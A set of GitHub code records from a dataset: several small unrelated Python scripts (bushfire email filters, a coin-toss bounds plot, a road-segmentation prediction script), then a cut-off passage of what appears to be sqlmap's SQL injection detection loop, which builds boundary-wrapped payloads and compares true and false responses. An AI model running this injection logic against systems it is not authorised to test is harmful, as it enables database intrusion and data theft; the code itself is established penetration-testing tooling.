\"url\":\r\n return utils.get_bushfire_url(request,bushfire,url_type)\r\n elif field_name == \"report_status\":\r\n return bushfire.report_status_name\r\n elif field_name == \"latitude_degree\":\r\n return LatLon.Latitude(bushfire.origin_point.get_y()).degree\r\n elif field_name == \"latitude_minute\":\r\n return LatLon.Latitude(bushfire.origin_point.get_y()).minute\r\n elif field_name == \"latitude_second\":\r\n return LatLon.Latitude(bushfire.origin_point.get_y()).second\r\n elif field_name == \"longitude_degree\":\r\n return LatLon.Longitude(bushfire.origin_point.get_x()).degree\r\n elif field_name == \"longitude_minute\":\r\n return LatLon.Longitude(bushfire.origin_point.get_x()).minute\r\n elif field_name == \"longitude_second\":\r\n return LatLon.Longitude(bushfire.origin_point.get_x()).second\r\n \r\n\r\n value = getattr(bushfire, FIELD_MAPPING.get(field_name) or field_name)\r\n if field_name == \"dfes_incident_no\":\r\n return value or \"Not available\"\r\n elif value is None:\r\n return \"-\"\r\n elif type(value) == type(True):\r\n return \"Yes\" if value else \"No\"\r\n elif field_name == \"dispatch_pw\":\r\n return \"Yes\" if value == 1 else \"No\"\r\n elif isinstance(value,datetime.datetime):\r\n return value.astimezone(tz.gettz(settings.TIME_ZONE)).strftime('%Y-%m-%d %H:%M')\r\n else:\r\n value = str(value).strip()\r\n return value or \"-\"\r\n except:\r\n return \"-\"\r\n else:\r\n return \"-\"\r\n\r\n@register.filter(is_safe=True)\r\ndef field_style(field_name, bushfire=None):\r\n \"\"\"\r\n Return the style to display the value of model field in the email\r\n \"\"\"\r\n if bushfire:\r\n try:\r\n value = getattr(bushfire, field_name)\r\n if field_name == \"dfes_incident_no\":\r\n return \"\" if value else \"color:red;\"\r\n else:\r\n return \"\"\r\n except:\r\n return \"\"\r\n else:\r\n return \"\"\r\n\r\n","repo_name":"dbca-wa/bfrs","sub_path":"bfrs/templatetags/email_tags.py","file_name":"email_tags.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"16933849573","text":"import numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\ndata = np.random.binomial(1, 0.25, (100000, 1000))\r\nepsilon = [0.5, 0.25, 0.1, 0.01, 0.001]\r\ntosses = np.arange(1, 1001)\r\n\r\n\r\ndef plot_means():\r\n for i in range(5):\r\n plt.plot(tosses, np.cumsum(data[i]) / tosses)\r\n plt.xlabel(\"Number of coins tosses\")\r\n plt.ylabel(\"Mean value\")\r\n plt.show()\r\n\r\n\r\ndef plot_variances():\r\n for eps in epsilon:\r\n plt.plot(tosses, np.minimum(1, 1 / (4 * tosses * (eps ** 2))), 'r',\r\n label='Chebyshev Bound')\r\n plt.plot(tosses, np.minimum(1, 2 * np.exp(-2 * tosses * (eps ** 2))),\r\n 'b', label='Hoeffding Bound')\r\n\r\n plt.plot(tosses,\r\n np.sum(abs((np.cumsum(data, axis=1) / tosses) - 0.25) >= eps,\r\n axis=0) / 100000, 'g', label='Percentage')\r\n\r\n plt.xlabel(\"Number of coins tosses\")\r\n plt.ylabel(\"Probability\")\r\n plt.title(r\"$\\epsilon$ = \" + str(eps))\r\n plt.legend()\r\n plt.show()\r\n\r\n\r\nplot_means()\r\nplot_variances()\r\n","repo_name":"RonMordoch/IML","sub_path":"Ex1/q16_concentration_inequalities.py","file_name":"q16_concentration_inequalities.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"5628952419","text":"\r\n\r\n\r\nar = [\"aba\", \"baba\", \"aba\", \"xzxb\"] #string input\r\narr = [\"aba\", \"xzxb\", \"ab\"] #queries to be searched\r\narray = []\r\n\r\nfor i in arr:\r\n count = 0\r\n for j in ar:\r\n if i == j:\r\n count += 1\r\n array.append(count)\r\nprint(array)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"alif2499/HackerRank-Solutions","sub_path":"sparse_array_hackerrank.py","file_name":"sparse_array_hackerrank.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"36495214691","text":"# -*- coding: utf-8 -*-\r\nimport os\r\nimport sys\r\nfrom os import path, listdir, mkdir\r\nimport numpy as np\r\nnp.random.seed(1)\r\nimport random\r\nrandom.seed(1)\r\nimport tensorflow as tf\r\ntf.set_random_seed(1)\r\nimport timeit\r\nimport cv2\r\nfrom models import get_vgg_unet\r\nimport skimage.io\r\nfrom tqdm import tqdm\r\n\r\ninput_shape = (1344, 1344)\r\n\r\ndef preprocess_inputs(x):\r\n zero_msk = (x == 0)\r\n x = x / 8.0\r\n x -= 127.5\r\n x[zero_msk] = 0\r\n return x\r\n\r\n\r\nif __name__ == '__main__':\r\n models_folder = 'wdata/AOI_3_Paris_Roads_Train/nn_models'\r\n pred_folder = 'wdata/predictions'\r\n model_name = 'vgg_big'\r\n\r\n city_datasets = dict(Vegas = 'AOI_2_Vegas_Roads_Train',\r\n Paris = 'AOI_3_Paris_Roads_Train')\r\n cities = ['Vegas', 'Paris']\r\n # cities = city_datasets.values()\r\n\r\n t0 = timeit.default_timer()\r\n\r\n\r\n if not path.isdir(pred_folder):\r\n mkdir(os.path.join(os.getcwd(),pred_folder))\r\n\r\n if not path.isdir(path.join(pred_folder, model_name)):\r\n mkdir(path.join(pred_folder, model_name))\r\n\r\n for it in [0, 1]:\r\n models = []\r\n\r\n if not path.isdir(path.join(pred_folder, model_name, str(it))):\r\n mkdir(path.join(pred_folder, model_name, str(it)))\r\n\r\n for i, city in enumerate(city_datasets):\r\n\r\n if not path.isdir(path.join(path.join(pred_folder, model_name, str(it), city))):\r\n mkdir(path.join(path.join(pred_folder, model_name, str(it), city)))\r\n model = get_vgg_unet(input_shape, weights=None)\r\n model.load_weights(path.join(models_folder, 'vgg_model3_weights2_{0}_{1}.h5'.format(city, it)))\r\n models.append(model)\r\n\r\n print('Predictiong fold', it)\r\n for city, d in city_datasets.items():\r\n for f in tqdm(sorted(listdir(path.join('wdata',d, 'MUL-PanSharpen')))):\r\n if path.isfile(path.join('wdata',d, 'MUL-PanSharpen', f)) and '.tif' in f:\r\n img_id = f.split('PanSharpen_')[1].split('.')[0]\r\n cinp = np.zeros((4,))\r\n cinp[cities.index(img_id.split('_')[2])] = 1.0\r\n cid = cinp.argmax()\r\n fpath = path.join('wdata',d, 'MUL-PanSharpen', f)\r\n img = skimage.io.imread(fpath, plugin='tifffile')\r\n img = cv2.copyMakeBorder(img, 22, 22, 22, 22, cv2.BORDER_REFLECT_101)\r\n inp = []\r\n inp.append(img)\r\n inp.append(np.rot90(img, k=1))\r\n inp = np.asarray(inp)\r\n inp = preprocess_inputs(inp)\r\n inp2 = []\r\n inp2.append(cinp)\r\n inp2.append(cinp)\r\n inp2 = np.asarray(inp2)\r\n pred = models[cid].predict([inp, inp2])\r\n mask = pred[0] + np.rot90(pred[1], k=3)\r\n mask /= 2\r\n mask = mask[22:1322, 22:1322, ...]\r\n mask = mask * 255\r\n mask = mask.astype('uint8')\r\n cv2.imwrite(path.join(pred_folder, model_name, str(it), city, '{0}.png'.format(img_id)), mask, [cv2.IMWRITE_PNG_COMPRESSION, 9])\r\n\r\n elapsed = timeit.default_timer() - t0\r\n print('Time: {:.3f} min'.format(elapsed / 60))\r\n","repo_name":"giserh/SpaceNet_Cannab_Geoyi_Update","sub_path":"Road_Detector_pacage/predict_vgg.py","file_name":"predict_vgg.py","file_ext":"py","file_size_in_byte":3310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29798903607","text":"# We're going to calculate the years of experience that\n# we made up with all the employees\n\nimport json\nimport functools\n\nwith open('src/employees.json') as json_file:\n data = json.load(json_file)\n\n total_years = functools.reduce(\n lambda acc, emp: acc + emp['years_of_experience'], data, 0\n )\n\n print(total_years)\n","repo_name":"felixminom/intro_to_fp","sub_path":"src/reduce/fp_reduce.py","file_name":"fp_reduce.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"22653413499","text":"import copy\nimport logging\nimport random\nimport re\nimport socket\nimport time\n\nfrom extra.beep.beep import beep\nfrom lib.core.agent import agent\nfrom lib.core.common import Backend\nfrom lib.core.common import extractRegexResult\nfrom lib.core.common import extractTextTagContent\nfrom lib.core.common import filterNone\nfrom lib.core.common import findDynamicContent\nfrom lib.core.common import Format\nfrom lib.core.common import getFilteredPageContent\nfrom lib.core.common import getLastRequestHTTPError\nfrom lib.core.common import getPublicTypeMembers\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import getSortedInjectionTests\nfrom lib.core.common import hashDBRetrieve\nfrom lib.core.common import hashDBWrite\nfrom lib.core.common import intersect\nfrom lib.core.common import isDigit\nfrom lib.core.common import joinValue\nfrom lib.core.common import listToStrValue\nfrom lib.core.common import parseFilePaths\nfrom lib.core.common import popValue\nfrom lib.core.common import pushValue\nfrom lib.core.common import randomInt\nfrom lib.core.common import randomStr\nfrom lib.core.common import readInput\nfrom lib.core.common import showStaticWords\nfrom lib.core.common import singleTimeLogMessage\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.common import wasLastResponseDBMSError\nfrom lib.core.common import wasLastResponseHTTPError\nfrom lib.core.compat import xrange\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.datatype import AttribDict\nfrom lib.core.datatype import InjectionDict\nfrom lib.core.decorators import stackedmethod\nfrom lib.core.dicts import FROM_DUMMY_TABLE\nfrom lib.core.dicts import HEURISTIC_NULL_EVAL\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import HASHDB_KEYS\nfrom lib.core.enums import HEURISTIC_TEST\nfrom lib.core.enums import HTTP_HEADER\nfrom lib.core.enums import HTTPMETHOD\nfrom lib.core.enums import NOTE\nfrom lib.core.enums import NULLCONNECTION\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.enums import PLACE\nfrom lib.core.enums import REDIRECTION\nfrom lib.core.enums import WEB_PLATFORM\nfrom lib.core.exception import SqlmapConnectionException\nfrom lib.core.exception import SqlmapDataException\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.core.exception import SqlmapSilentQuitException\nfrom lib.core.exception import SqlmapSkipTargetException\nfrom lib.core.exception import SqlmapUserQuitException\nfrom lib.core.settings import BOUNDED_INJECTION_MARKER\nfrom lib.core.settings import CANDIDATE_SENTENCE_MIN_LENGTH\nfrom lib.core.settings import CHECK_INTERNET_ADDRESS\nfrom lib.core.settings import CHECK_INTERNET_VALUE\nfrom lib.core.settings import DEFAULT_COOKIE_DELIMITER\nfrom lib.core.settings import DEFAULT_GET_POST_DELIMITER\nfrom lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX\nfrom lib.core.settings import FI_ERROR_REGEX\nfrom lib.core.settings import FORMAT_EXCEPTION_STRINGS\nfrom lib.core.settings import HEURISTIC_CHECK_ALPHABET\nfrom lib.core.settings import INFERENCE_EQUALS_CHAR\nfrom lib.core.settings import IPS_WAF_CHECK_PAYLOAD\nfrom lib.core.settings import IPS_WAF_CHECK_RATIO\nfrom lib.core.settings import IPS_WAF_CHECK_TIMEOUT\nfrom lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH\nfrom lib.core.settings import MAX_STABILITY_DELAY\nfrom lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH\nfrom lib.core.settings import PRECONNECT_INCOMPATIBLE_SERVERS\nfrom lib.core.settings import SINGLE_QUOTE_MARKER\nfrom lib.core.settings import SLEEP_TIME_MARKER\nfrom lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH\nfrom lib.core.settings import SUPPORTED_DBMS\nfrom lib.core.settings import UPPER_RATIO_BOUND\nfrom lib.core.settings import URI_HTTP_HEADER\nfrom lib.core.threads import getCurrentThreadData\nfrom lib.core.unescaper import unescaper\nfrom lib.request.connect import Connect as Request\nfrom lib.request.comparison import comparison\nfrom lib.request.inject import checkBooleanExpression\nfrom lib.request.templates import getPageTemplate\nfrom lib.techniques.union.test import unionTest\nfrom lib.techniques.union.use import configUnion\nfrom thirdparty import six\nfrom thirdparty.six.moves import http_client as _http_client\n\ndef checkSqlInjection(place, parameter, value):\n # Store here the details about boundaries and payload used to\n # successfully inject\n injection = InjectionDict()\n\n # Localized thread data needed for some methods\n threadData = getCurrentThreadData()\n\n # Favoring non-string specific boundaries in case of digit-like parameter values\n if isDigit(value):\n kb.cache.intBoundaries = kb.cache.intBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: any(_ in (boundary.prefix or \"\") or _ in (boundary.suffix or \"\") for _ in ('\"', '\\'')))\n boundaries = kb.cache.intBoundaries\n elif value.isalpha():\n kb.cache.alphaBoundaries = kb.cache.alphaBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: not any(_ in (boundary.prefix or \"\") or _ in (boundary.suffix or \"\") for _ in ('\"', '\\'')))\n boundaries = kb.cache.alphaBoundaries\n else:\n boundaries = conf.boundaries\n\n # Set the flag for SQL injection test mode\n kb.testMode = True\n\n paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place\n tests = getSortedInjectionTests()\n seenPayload = set()\n\n kb.data.setdefault(\"randomInt\", str(randomInt(10)))\n kb.data.setdefault(\"randomStr\", str(randomStr(10)))\n\n while tests:\n test = tests.pop(0)\n\n try:\n if kb.endDetection:\n break\n\n if conf.dbms is None:\n # If the DBMS has not yet been fingerprinted (via simple heuristic check\n # or via DBMS-specific payload) and boolean-based blind has been identified\n # then attempt to identify with a simple DBMS specific boolean-based\n # test what the DBMS may be\n if not injection.dbms and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:\n if not Backend.getIdentifiedDbms() and kb.heuristicDbms is None and not kb.droppingRequests:\n kb.heuristicDbms = heuristicCheckDbms(injection)\n\n # If the DBMS has already been fingerprinted (via DBMS-specific\n # error message, simple heuristic check or via DBMS-specific\n # payload), ask the user to limit the tests to the fingerprinted\n # DBMS\n\n if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):\n msg = \"it looks like the back-end DBMS is '%s'. \" % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or joinValue(injection.dbms, '/'))\n msg += \"Do you want to skip test payloads specific for other DBMSes? [Y/n]\"\n kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else []\n\n # If the DBMS has been fingerprinted (via DBMS-specific error\n # message, via simple heuristic check or via DBMS-specific\n # payload), ask the user to extend the tests to all DBMS-specific,\n # regardless of --level and --risk values provided\n if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):\n msg = \"for the remaining tests, do you want to include all tests \"\n msg += \"for '%s' extending provided \" % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or joinValue(injection.dbms, '/'))\n msg += \"level (%d)\" % conf.level if conf.level < 5 else \"\"\n msg += \" and \" if conf.level < 5 and conf.risk < 3 else \"\"\n msg += \"risk (%d)\" % conf.risk if conf.risk < 3 else \"\"\n msg += \" values? [Y/n]\" if conf.level < 5 and conf.risk < 3 else \" value? [Y/n]\"\n kb.extendTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else []\n\n title = test.title\n kb.testType = stype = test.stype\n clause = test.clause\n unionExtended = False\n trueCode, falseCode = None, None\n\n if conf.httpCollector is not None:\n conf.httpCollector.setExtendedArguments({\n \"_title\": title,\n \"_place\": place,\n \"_parameter\": parameter,\n })\n\n if stype == PAYLOAD.TECHNIQUE.UNION:\n configUnion(test.request.char)\n\n if \"[CHAR]\" in title:\n if conf.uChar is None:\n continue\n else:\n title = title.replace(\"[CHAR]\", conf.uChar)\n\n elif \"[RANDNUM]\" in title or \"(NULL)\" in title:\n title = title.replace(\"[RANDNUM]\", \"random number\")\n\n if test.request.columns == \"[COLSTART]-[COLSTOP]\":\n if conf.uCols is None:\n continue\n else:\n title = title.replace(\"[COLSTART]\", str(conf.uColsStart))\n title = title.replace(\"[COLSTOP]\", str(conf.uColsStop))\n\n elif conf.uCols is not None:\n debugMsg = \"skipping test '%s' because the user \" % title\n debugMsg += \"provided custom column range %s\" % conf.uCols\n logger.debug(debugMsg)\n continue\n\n match = re.search(r\"(\\d+)-(\\d+)\", test.request.columns)\n if match and injection.data:\n lower, upper = int(match.group(1)), int(match.group(2))\n for _ in (lower, upper):\n if _ > 1:\n __ = 2 * (_ - 1) + 1 if _ == lower else 2 * _\n unionExtended = True\n test.request._columns = test.request.columns\n test.request.columns = re.sub(r\"\\b%d\\b\" % _, str(__), test.request.columns)\n title = re.sub(r\"\\b%d\\b\" % _, str(__), title)\n test.title = re.sub(r\"\\b%d\\b\" % _, str(__), test.title)\n\n # Skip test if the user's wants to test only for a specific\n # technique\n if conf.technique and isinstance(conf.technique, list) and stype not in conf.technique:\n debugMsg = \"skipping test '%s' because user \" % title\n debugMsg += \"specified testing of only \"\n debugMsg += \"%s techniques\" % \" & \".join(PAYLOAD.SQLINJECTION[_] for _ in conf.technique)\n logger.debug(debugMsg)\n continue\n\n # Skip test if it is the same SQL injection type already\n # identified by another test\n if injection.data and stype in injection.data:\n debugMsg = \"skipping test '%s' because \" % title\n debugMsg += \"the payload for %s has \" % PAYLOAD.SQLINJECTION[stype]\n debugMsg += \"already been identified\"\n logger.debug(debugMsg)\n continue\n\n # Parse DBMS-specific payloads' details\n if \"details\" in test and \"dbms\" in test.details:\n payloadDbms = test.details.dbms\n else:\n payloadDbms = None\n\n # Skip tests if title, vector or DBMS is not included by the\n # given test filter\n if conf.testFilter and not any(conf.testFilter in str(item) or re.search(conf.testFilter, str(item), re.I) for item in (test.title, test.vector, payloadDbms)):\n debugMsg = \"skipping test '%s' because its \" % title\n debugMsg += \"name/vector/DBMS is not included by the given filter\"\n logger.debug(debugMsg)\n continue\n\n # Skip tests if title, vector or DBMS is included by the\n # given skip filter\n if conf.testSkip and any(conf.testSkip in str(item) or re.search(conf.testSkip, str(item), re.I) for item in (test.title, test.vector, payloadDbms)):\n debugMsg = \"skipping test '%s' because its \" % title\n debugMsg += \"name/vector/DBMS is included by the given skip filter\"\n logger.debug(debugMsg)\n continue\n\n if payloadDbms is not None:\n # Skip DBMS-specific test if it does not match the user's\n # provided DBMS\n if conf.dbms and not intersect(payloadDbms, conf.dbms, True):\n debugMsg = \"skipping test '%s' because \" % title\n debugMsg += \"its declared DBMS is different than provided\"\n logger.debug(debugMsg)\n continue\n\n elif kb.dbmsFilter and not intersect(payloadDbms, kb.dbmsFilter, True):\n debugMsg = \"skipping test '%s' because \" % title\n debugMsg += \"its declared DBMS is different than provided\"\n logger.debug(debugMsg)\n continue\n\n elif kb.reduceTests == False:\n pass\n\n # Skip DBMS-specific test if it does not match the\n # previously identified DBMS (via DBMS-specific payload)\n elif injection.dbms and not intersect(payloadDbms, injection.dbms, True):\n debugMsg = \"skipping test '%s' because \" % title\n debugMsg += \"its declared DBMS is different than identified\"\n logger.debug(debugMsg)\n continue\n\n # Skip DBMS-specific test if it does not match the\n # previously identified DBMS (via DBMS-specific error message)\n elif kb.reduceTests and not intersect(payloadDbms, kb.reduceTests, True):\n debugMsg = \"skipping test '%s' because the heuristic \" % title\n debugMsg += \"tests showed that the back-end DBMS \"\n debugMsg += \"could be '%s'\" % unArrayizeValue(kb.reduceTests)\n logger.debug(debugMsg)\n continue\n\n # If the user did not decide to extend the tests to all\n # DBMS-specific or the test payloads is not specific to the\n # identified DBMS, then only test for it if both level and risk\n # are below the corrisponding configuration's level and risk\n # values\n if not conf.testFilter and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):\n # Skip test if the risk is higher than the provided (or default)\n # value\n if test.risk > conf.risk:\n debugMsg = \"skipping test '%s' because the risk (%d) \" % (title, test.risk)\n debugMsg += \"is higher than the provided (%d)\" % conf.risk\n logger.debug(debugMsg)\n continue\n\n # Skip test if the level is higher than the provided (or default)\n # value\n if test.level > conf.level:\n debugMsg = \"skipping test '%s' because the level (%d) \" % (title, test.level)\n debugMsg += \"is higher than the provided (%d)\" % conf.level\n logger.debug(debugMsg)\n continue\n\n # Skip test if it does not match the same SQL injection clause\n # already identified by another test\n clauseMatch = False\n\n for clauseTest in clause:\n if injection.clause is not None and clauseTest in injection.clause:\n clauseMatch = True\n break\n\n if clause != [0] and injection.clause and injection.clause != [0] and not clauseMatch:\n debugMsg = \"skipping test '%s' because the clauses \" % title\n debugMsg += \"differ from the clause already identified\"\n logger.debug(debugMsg)\n continue\n\n # Skip test if the user provided custom character (for UNION-based payloads)\n if conf.uChar is not None and (\"random number\" in title or \"(NULL)\" in title):\n debugMsg = \"skipping test '%s' because the user \" % title\n debugMsg += \"provided a specific character, %s\" % conf.uChar\n logger.debug(debugMsg)\n continue\n\n if stype == PAYLOAD.TECHNIQUE.UNION:\n match = re.search(r\"(\\d+)-(\\d+)\", test.request.columns)\n if match and not injection.data:\n _ = test.request.columns.split('-')[-1]\n if conf.uCols is None and _.isdigit():\n if kb.futileUnion is None:\n msg = \"it is recommended to perform \"\n msg += \"only basic UNION tests if there is not \"\n msg += \"at least one other (potential) \"\n msg += \"technique found. Do you want to reduce \"\n msg += \"the number of requests? [Y/n] \"\n kb.futileUnion = readInput(msg, default='Y', boolean=True)\n\n if kb.futileUnion and int(_) > 10:\n debugMsg = \"skipping test '%s'\" % title\n logger.debug(debugMsg)\n continue\n\n infoMsg = \"testing '%s'\" % title\n logger.info(infoMsg)\n\n # Force back-end DBMS according to the current test DBMS value\n # for proper payload unescaping\n Backend.forceDbms(payloadDbms[0] if isinstance(payloadDbms, list) else payloadDbms)\n\n # Parse test's \n comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None\n fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or \"\") else None)\n\n for boundary in boundaries:\n injectable = False\n\n # Skip boundary if the level is higher than the provided (or\n # default) value\n # Parse boundary's \n if boundary.level > conf.level and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):\n continue\n\n # Skip boundary if it does not match against test's \n # Parse test's and boundary's \n clauseMatch = False\n\n for clauseTest in test.clause:\n if clauseTest in boundary.clause:\n clauseMatch = True\n break\n\n if test.clause != [0] and boundary.clause != [0] and not clauseMatch:\n continue\n\n # Skip boundary if it does not match against test's \n # Parse test's and boundary's \n whereMatch = False\n\n for where in test.where:\n if where in boundary.where:\n whereMatch = True\n break\n\n if not whereMatch:\n continue\n\n # Parse boundary's , and \n prefix = boundary.prefix or \"\"\n suffix = boundary.suffix or \"\"\n ptype = boundary.ptype\n\n # Options --prefix/--suffix have a higher priority (if set by user)\n prefix = conf.prefix if conf.prefix is not None else prefix\n suffix = conf.suffix if conf.suffix is not None else suffix\n comment = None if conf.suffix is not None else comment\n\n # If the previous injections succeeded, we know which prefix,\n # suffix and parameter type to use for further tests, no\n # need to cycle through the boundaries for the following tests\n condBound = (injection.prefix is not None and injection.suffix is not None)\n condBound &= (injection.prefix != prefix or injection.suffix != suffix)\n condType = injection.ptype is not None and injection.ptype != ptype\n\n # If the payload is an inline query test for it regardless\n # of previously identified injection types\n if stype != PAYLOAD.TECHNIQUE.QUERY and (condBound or condType):\n continue\n\n # For each test's \n for where in test.where:\n templatePayload = None\n vector = None\n\n origValue = value\n if kb.customInjectionMark in origValue:\n origValue = origValue.split(kb.customInjectionMark)[0]\n origValue = re.search(r\"(\\w*)\\Z\", origValue).group(1)\n\n # Treat the parameter original value according to the\n # test's tag\n if where == PAYLOAD.WHERE.ORIGINAL or conf.prefix:\n if kb.tamperFunctions:\n templatePayload = agent.payload(place, parameter, value=\"\", newValue=origValue, where=where)\n elif where == PAYLOAD.WHERE.NEGATIVE:\n # Use different page template than the original\n # one as we are changing parameters value, which\n # will likely result in a different content\n\n if conf.invalidLogical:\n _ = int(kb.data.randomInt[:2])\n origValue = \"%s AND %s LIKE %s\" % (origValue, _, _ + 1)\n elif conf.invalidBignum:\n origValue = kb.data.randomInt[:6]\n elif conf.invalidString:\n origValue = kb.data.randomStr[:6]\n else:\n origValue = \"-%s\" % kb.data.randomInt[:4]\n\n templatePayload = agent.payload(place, parameter, value=\"\", newValue=origValue, where=where)\n elif where == PAYLOAD.WHERE.REPLACE:\n origValue = \"\"\n\n kb.pageTemplate, kb.errorIsNone = getPageTemplate(templatePayload, place)\n\n # Forge request payload by prepending with boundary's\n # prefix and appending the boundary's suffix to the\n # test's ' ' string\n if fstPayload:\n boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause)\n boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)\n reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)\n\n if reqPayload:\n stripPayload = re.sub(r\"(\\A|\\b|_)([A-Za-z]{4}((?.\\g<4>\", reqPayload)\n if stripPayload in seenPayload:\n continue\n else:\n seenPayload.add(stripPayload)\n else:\n reqPayload = None\n\n # Perform the test's request and check whether or not the\n # payload was successful\n # Parse test's \n for method, check in test.response.items():\n check = agent.cleanupPayload(check, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or \"\") else None)\n\n # In case of boolean-based blind SQL injection\n if method == PAYLOAD.METHOD.COMPARISON:\n # Generate payload used for comparison\n def genCmpPayload():\n sndPayload = agent.cleanupPayload(test.response.comparison, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or \"\") else None)\n\n # Forge response payload by prepending with\n # boundary's prefix and appending the boundary's\n # suffix to the test's ' '\n # string\n boundPayload = agent.prefixQuery(sndPayload, prefix, where, clause)\n boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)\n cmpPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)\n\n return cmpPayload\n\n # Useful to set kb.matchRatio at first based on False response content\n kb.matchRatio = None\n kb.negativeLogic = (where == PAYLOAD.WHERE.NEGATIVE)\n suggestion = None\n Request.queryPage(genCmpPayload(), place, raise404=False)\n falsePage, falseHeaders, falseCode = threadData.lastComparisonPage or \"\", threadData.lastComparisonHeaders, threadData.lastComparisonCode\n falseRawResponse = \"%s%s\" % (falseHeaders, falsePage)\n\n # Checking if there is difference between current FALSE, original and heuristics page (i.e. not used parameter)\n if not any((kb.negativeLogic, conf.string, conf.notString, conf.code)):\n try:\n ratio = 1.0\n seqMatcher = getCurrentThreadData().seqMatcher\n\n for current in (kb.originalPage, kb.heuristicPage):\n seqMatcher.set_seq1(current or \"\")\n seqMatcher.set_seq2(falsePage or \"\")\n ratio *= seqMatcher.quick_ratio()\n\n if ratio == 1.0:\n continue\n except (MemoryError, OverflowError):\n pass\n\n # Perform the test's True request\n trueResult = Request.queryPage(reqPayload, place, raise404=False)\n truePage, trueHeaders, trueCode = threadData.lastComparisonPage or \"\", threadData.lastComparisonHeaders, threadData.lastComparisonCode\n trueRawResponse = \"%s%s\" % (trueHeaders, truePage)\n\n if trueResult and not(truePage == falsePage and not any((kb.nullConnection, conf.code))):\n # Perform the test's False request\n falseResult = Request.queryPage(genCmpPayload(), place, raise404=False)\n\n if not falseResult:\n if kb.negativeLogic:\n boundPayload = agent.prefixQuery(kb.data.randomStr, prefix, where, clause)\n boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)\n errorPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)\n\n errorResult = Request.queryPage(errorPayload, place, raise404=False)\n if errorResult:\n continue\n elif kb.heuristicPage and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):\n _ = comparison(kb.heuristicPage, None, getRatioValue=True)\n if (_ or 0) > (kb.matchRatio or 0):\n kb.matchRatio = _\n logger.debug(\"adjusting match ratio for current parameter to %.3f\" % kb.matchRatio)\n\n # Reducing false-positive \"appears\" messages in heavily dynamic environment\n if kb.heavilyDynamic and not Request.queryPage(reqPayload, place, raise404=False):\n continue\n\n injectable = True\n\n elif (threadData.lastComparisonRatio or 0) > UPPER_RATIO_BOUND and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):\n originalSet = set(getFilteredPageContent(kb.pageTemplate, True, \"\\n\").split(\"\\n\"))\n trueSet = set(getFilteredPageContent(truePage, True, \"\\n\").split(\"\\n\"))\n falseSet = set(getFilteredPageContent(falsePage, True, \"\\n\").split(\"\\n\"))\n\n if threadData.lastErrorPage and threadData.lastErrorPage[1]:\n errorSet = set(getFilteredPageContent(threadData.lastErrorPage[1], True, \"\\n\").split(\"\\n\"))\n else:\n errorSet = set()\n\n if originalSet == trueSet != falseSet:\n candidates = trueSet - falseSet - errorSet\n\n if candidates:\n candidates = sorted(candidates, key=len)\n for candidate in candidates:\n if re.match(r\"\\A[\\w.,! ]+\\Z\", candidate) and ' ' in candidate and candidate.strip() and len(candidate) > CANDIDATE_SENTENCE_MIN_LENGTH:\n suggestion = conf.string = candidate\n injectable = True\n\n infoMsg = \"%sparameter '%s' appears to be '%s' injectable (with --string=\\\"%s\\\")\" % (\"%s \" % paramType if paramType != parameter else \"\", parameter, title, repr(conf.string).lstrip('u').strip(\"'\"))\n 